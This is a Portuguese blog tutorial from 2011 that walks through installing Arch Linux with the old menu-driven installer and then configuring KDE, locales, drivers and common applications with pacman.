
Postado por Gustavo Lima do blog coruja de TI
http://blog.corujadeti.com.br

terça-feira, 10 de maio de 2011

Archlinux

A pouco tempo migrei para o archlinux, e uma das mais maravilhasas distros que puder ter o prazer de utilizar.
Então para os adpitos do linux que queiram testa-la, vai algumas dicas:

Primeiramente baixe o Arch:
http://www.archlinux.org/download/

Aconselho o Download do Core Image Dual Architecture, pois foi o usado nesse tutorial.

Ao dar o Boot pelo CD a primeira tela com a qual nos deparamos é essa:


­
Uma das coisas mais interessantes que notei nessa nova versão foi justamente a imagem em Dual Architecture, isso é uma verdadeira mão na roda, pois você pode escolher durante a instalação qual arquitetura seu sistema vai ter, ou seja, se será instalado o Arch 32 ou 64 bits, tudo em um CD só…

Portanto escolha a sua arquitetura e tecle enter.

Após o carregamento do sistema o Arch vai lhe pedir o login, digite root, logo após já como root digite km e tecle enter, como na tela abaixo:


 

O instalador irá retornar uma tela para que você escolha o “keymap”, escolha abnt2 caso seu teclado tenha o ‘ç’, como na imagem abaixo:





Agora escolha a fonte que será usada no modo texto e tecle enter, pode ser qualquer uma, particularmente gosto de escolher a Agafari no tamanho 14 como na imagem a baixo:



Agora vamos de fato começar a instalação, digite /arch/setup como na tela abaixo:



Será retornada uma tela de boas-vindas, tecle enter.
Finalmente aparecerá o Menu de Instalação:



Em Select Source, tecle enter,

Escolha cd CD-ROM or OTHER SOURCE e tecle enter, na mensagem seguinte, enter.

Feito isso ele automaticamente já vai cair na segunda opção, Set clock, tecle enter:



1 Select region and timezone, enter.
Escolha América e tecle enter, escolha São_Paulo e tecle enter.

2 Set time and date, enter.
Escolha UTC e tecle enter (isso não faz muita diferença porque você pode alterar no modo gráfico depois).
Return Looks good, back to main menu, enter.

3 Return to Main Menu, enter:



A próxima tela requer um pouco mais de atenção porque é a tela de particionamento  3 Prepare Hard Drive(s):



Não vou entrar em detalhes sobre essa parte porque vai depender de como o seu HD está particionado ou como você queira que ele fique…

Obs.: O particionador usado é o cfdisk, que é em modo de texto. Feito o particionamento, você deve informar qual será a Swap e qual a partição Raiz do sistema.

No meu caso como as minhas partições já estão definidas escolho sempre a 3ª opção, onde simplesmente defino qual será a Swap e a Raiz.

Feito o particionamento, na última tela dê OK:



Ná próxima tela vamos escolher os pacotes a serem instalados:



Se preferir uma instalação mais completa, sem maiores dores de cabeça futuramente marque também o base-devel e dê OK.



Confira se todos os pacotes estão marcados e dê OK:



Então escolha 5 Install Packages, dê OK e faça como nas telas abaixo:



Digite Y e tecle enter.



Continue, enter, espere a instalação dos pacotes, ao terminar dê Ok e cairá na próxima tela:



6 Configure System, enter.

Feito isso, na próxima tela, a instalação perguntará qual editor de texto você deseja usar:



Eu estou mais familiarizado com o nano, portanto vou utilizá-lo, escolha o que você está mais acostumado a usar.

Na próxima tela vamos fazer a edição de alguns arquivos, pra muitos essa pode parecer a parte mais complicada mas na verdade é bem simples.



O primeiro arquivo que vamos editar é o rc.conf:



Procure pelas linhas:
HOSTNAME = “myhost” e substitua por “archlinux” (ou qualquer outra coisa do tipo)
LOCALE = “en_US.uft-8” por “pt_BR.utf-8″

Salve e saia.

O próximo arquivo que vamos editar é o pacman.d/mirrorlist:



Escolha-o, dê enter e faça as seguintes modificações:

Procure pelos Servers do Brasil e descomente-os como na imagem abaixo:



Salve e saia.

E por fim o arquivo Root-Password, enter:



Digite a senha de root e repita-a como será pedido.

Automaticamente ele já vai voltar no menu de configuração, escolha Done e dê OK.

Espere até que todas as alterações sejam feitas e automaticamente reaparecerá o Main Menu.

Por último vamos instalar o Bootloader:
 
7 Install Bootloader, enter:



Escolha Grub e tecle enter, na próxima tela, OK. Automaticamente ele já vai abrir o menu.lst no nano, você pode fazer a edição logo de cara, configurando o tempo de boot e outros Sistemas Operacionais presentes. Como no meu caso, só tem o Arch vou configurar o tempo para 0 segundos, salvar o arquivo e sair.

Escolha o lugar onde o Grub será instalado:



Já está certo, /dev/sda que é a MBR, só dar enter e OK para confirmar na próxima tela:



Pronto, nossa instalação está concluída, dê OK:



Agora vamos para os retoques finais:

Primeiramente vamos atualizar o pacman com o comando pacman -Syu:



Essa atualização será pequena, feito isso rode novamente o comando pacman-Syu, essa será um pouco maior.



Vamos as instalações necessárias:

pacman -S alsa-utils
ou
pacman -S pulseaudio

Obs.: Se escolher o pulseaudio não adicione o Alsa aos Daemons!

Instalado o alsa, é necessário fazer também a instalação do vídeo, no meu desktop tenho uma nvidia no meu notebook uma intel, segue abaixo o comando que uso para instalá-las respectivamente:

pacman -S nvidia
pacman -S xf86-video-intel mesa
Se seu vídeo for ATI : http://wiki.archlinux-br.org/ATI#Drivers_ATI_Open-Source

Instale também:

pacman -S xorg
pacman -S hal fam dbus fuse acpid

Obs.: Essa parte da instalação mudou um pouco!

Primeiramente se seu vídeo for Nvidia a instalação do Xorg é dispensável, logo não instale-o! (não testei com outros como ATI e Intel)
Outro detalhe é que ao rodar o comando ele vai te dar opções para escolher entre alguns aplicativos/versões se quiser usar tudo default simplesmente dê enter até que apareça para você confirmar ou não a instalação (S/N), OK?
Futuramente postarei aqui as novas telas dessa parte da instalação.

Feitas as instalações vamos add o novo usuário:

adduser nomedousuário

Preencha com seus dados e em addional groups adicione:
power, network, video, hal, wheel, audio, storage, optical, floppy (separados por vírgulas mesmo.)



Feito isso, reinicie com um reboot e entre no seu usuário para instalarmos a interface, particularmente prefiro o KDE, mas você pode ver os procedimentos da instalação do gnome ou outra interface na Wiki do Arch, o comando para instalação é:

pacman -S kde kde-l10n-pt_br

Obs.: Sendo o segundo a ser instalado o pacote de idioma Português Brasileiro.



Responda Y e espere a conclusão da instação.
Instale também o Wicd para gerenciar as suas conexões com a internet com o comando:

pacman -S wicd
ou
pacman -S networkmanager network-manager-applet

Feito tudo isso só falta editar o MODULES e o DAEMONS no rc.conf

#nano /etc/rc.conf

Substitua MODULES = ( ) por MODULES (fuse)
Na linha DAEMONS deixe-a como na imagem abaixo:



Particularmente gosto de comentar o network deixando:
!network

Acho que o boot fica mais rápido…

Feito isso salve e saia.

Para que o Arch incie totalmente em português é necessário editar um arquivo chamado locale.gen para tal:

nano /etc/locale.gen

Descomente todas as linhas que começem com pt_BR
E você pode comente as linhas:
en_US.UTF-8 UTF-8
en_US ISO-8859-1
Feito isso Salve e saia.
Rode o comando #locale-gen para que as alterações no arquivo sejam de fato aplicadas como na imagem abaixo:

Reinicie a máquina e seu Arch estará instalado e pronto para usar.
Espero que este tutorial ajude de alguma forma quem deseja instalar esse maravilhoso Sistema Operacional!

Configurando o teclado abnt2:

No Arch foi necessário editar o Xorg, logo:
nano /etc/X11/xorg.conf.d/10-evdev.conf
Deixe a sessão do teclado assim:
Section “InputClass”
Identifier “evdev keyboard catchall”
MatchIsKeyboard “on”
MatchDevicePath “/dev/input/event*”
Driver “evdev”
Option “XkbLayout” “br”
Option “XkbVariant” “abnt2″
EndSection

Salve e saia.

---------------------//-----------------------


Pós instalação do Arch Linux!


Com esse tutorial tenho a intenção de ajudá-los com algumas pequenas configurações que devem ser feitas após a instalação do Arch Linux e também a instalação de alguns aplicativos fundamentais para o uso diário do sistema. É importante ressaltar que esse artigo tem um foco maior no KDE, já que é o Ambiente Gráfico que utilizo.
Bem…
Mãos a obra!

- Configurando o Touchpad -

No meu caso bastou instalar o pacote xf86-input-synaptics com o comando:
pacman -S xf86-input-synaptics

e reiniciar.

Se precisar de alguma outra configuração relacionada ao Touchpad é só utilizar o tutorial da Wiki.

= Configurações do Sistema =


-Mudando o layout do teclado-

Vá em Dispositivos de entrada, escolha Teclado e vá até a guia “Leiautes”
No botão “Adicionar leiaute” escolha o seu e Aplique.

-Habilitando duplo clique do Mouse-

Gosto de usar o duplo clique para abrir arquivos e pasta e como sabemos isso não é padrão do KDE, para mudar isto basta ir em Dispositivo de entrada/ Mouse/ Guia Geral e selecionar a opção:

“Clique duplo para abrir arquivos e pastas” e Aplicar.

-Configurando a Tela de autentificação-

Em Configurações do Sistema / Tela de autentificação

Na guia Geral mude o idioma para “Português brasileiro”

Particularmente gosto que o login seja feito de forma automática, para isso, vá à guia Conveniência e habilite a autentificação automatica escolhendo o seu user como na imagem abaixo:

e

Aplique.

= Instalações =

Em algumas categorias sugeri mais de uma opção de aplicativos de mesma função. Logo, escolha os de sua preferência.

- Internet -

-Navegadores
pacman -S firefox
pacman -S chromium
pacman -S Opera
-Mensageiros e Clentes IRC
pacman -S emesene
pacman -S amsn
pacman -S pidgin
pacman -S skype
pacman -S xchat
pacman -S wheechat

-Torrent

pacman -S ktorrent
Dica:

-Plugins opcionais

Emesene:

pacman -S gnome-python-extras gtkspell aspell gstreamer0.10-python gstreamer0.10-good-plugins

Pidgin:

pidgin-musictracker pidgin-fonomobutton

-Flash Player

32-bits:

pacman -S flashplugin

64-bits:

Para a instalação do flash no Arch 64-bits o repositório Multilib é necessário, logo:

#nano /etc/pacman.conf

Descomente o repositório deixando-o assim:

[multilib]
Include = /etc/pacman.d/mirrorlist

E finalmente:

pacman -Sy flashplugin

-Java

pacman -S openjdk6
ou
pacman -S jre

Fica a sua escolha, sendo o Openjdk6 a versão open source.

- Office -

pacman -S libreoffice libreoffice-pt-BR

- Multimidia -

pacman -S gstreamer0.10-{base,good,bad,ugly}-plugins gstreamer0.10-ffmpeg
pacman -S xine-lib
pacman -S smplayer amarok cheese k3b

Obs.: Se for de sua preferência o SMplayer pode ser substituído pelo VLC.

Gráfico:

pacman -S gimp

- Desenvolvimento -

pacman -S eclipse
pacman -S netbeans
pacman -S codeblocks

- Utilitários -

pacman -S unrar zip unzip p7zip

- Máquinas Virtuais -

-Virtualbox

pacman -S libvirt virtualbox virtualbox-additions virtualbox-guest-additions virtualbox-guest-modules

-VMware

Para instalar o VMware siga os passos na Wiki.

- Nota: Se precisar que alguma partição NTFS seja montada automáticamente siga esse Tutorial.

Depois de tudo isso, você perceberá que falta um pequeno detalhe, os aplicativos GTK não estarão com uma aparência legal. Para resolvermos isto siga os seguintes passos:

pacman -S gtk-qt-engine oxygen-gtk

E configure como nas imagens abaixo:



Os aplicativos GTK ficam com uma aparência muito bacana após esta configuração, confira:



Meus agradecimentos ao Corvolino, Bino e ao Douglas, que estão sempre dispostos a me ajudar e dar aquelas conferidas nos meus Artigos, muito obrigado meus amigos!
Espero que tenha ajudado e sugestões são sempre bem-vindas!


http://www.archlinux-br.org/

Fonte: http://giofilth.wordpress.com/

 

Subscribe to our Newsletter

Contact our Support

Email us: youremail@gmail.com

Our Team Memebers